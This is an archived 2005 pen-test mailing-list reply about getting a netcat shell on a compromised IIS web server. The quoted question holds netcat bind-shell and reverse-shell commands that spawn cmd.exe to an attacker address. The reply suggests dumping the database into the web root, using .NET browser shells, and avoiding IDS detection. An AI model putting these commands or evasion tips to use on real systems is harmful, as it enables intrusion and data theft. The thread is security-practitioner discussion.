RE: Netcat Question

From: Meidinger Chris (chris.meidinger@badenit.de)
Date: Wed Jun 01 2005 - 09:43:39 EDT

• Next message: Bartholomew, Brian J: "RE: Netcat Question"
• Previous message: intel96: "Netcat Question"
• Maybe in reply to: intel96: "Netcat Question"
• Next in thread: Bartholomew, Brian J: "RE: Netcat Question"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hi Intel,

I assume there is a firewall is between you and the webserver? That would be
a pretty logical explanation of why you can't access your bindshell.

If i were you, i would upload a script, have that script run locally to dump
the database and place the results in a folder in wwwroot. Then you can pick
it up with your browser.

If you want to get tricky, you should find a couple of .net applications
that act as browser shells.

But remember: unless you are combined testing incident response and
penetration you *don't* want to trip IDS. outbound connections from a web
server to a silly internet host on port 8000(!) are a dead giveaway for a
properly tuned IDS or a decent firewall admin. Don't be suprised if you get
blackholed.

Cheers,

Chris

> -----Original Message-----
> From: intel96 [mailto:intel96@bellsouth.net]
> Sent: Wednesday, June 01, 2005 12:39 AM
> To: pen-test@securityfocus.com
> Subject: Netcat Question
>
> To All,
>
> I am conducting a pentest and I have been able to upload
> netcat to the
> web server (IIS 6.0 - with ports 80/443 open) via ftp. I have
> tried to
> establish a shell both ways, but cannot get it to work:
>
> On the web server I first tried: nc.exe -l -p 8000 -e cmd.exe
>
> When I tried to connect to port 8000 on the web server I received a
> timeout on my side. I have also tried this with port 53 and
> it also did
> not work.
>
> I than tried: nc.exe -nv my_public_ip_address 443 -d -e cmd.exe
>
> This did not work either. I did not see the remote system trying to
> connect to my system via my logs. I have access to upload anything to
> the system and run most commands via sql injections. I have
> administrator level access on the system at this time.
>
> Any ideas on how I can get this shell to work? Or there any other
> commands that may provide me more access or allow me to dump
> the database?
>
> Thanks,
>
> Intel96
>
>
>

• Next message: Bartholomew, Brian J: "RE: Netcat Question"
• Previous message: intel96: "Netcat Question"
• Maybe in reply to: intel96: "Netcat Question"
• Next in thread: Bartholomew, Brian J: "RE: Netcat Question"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:22 EDT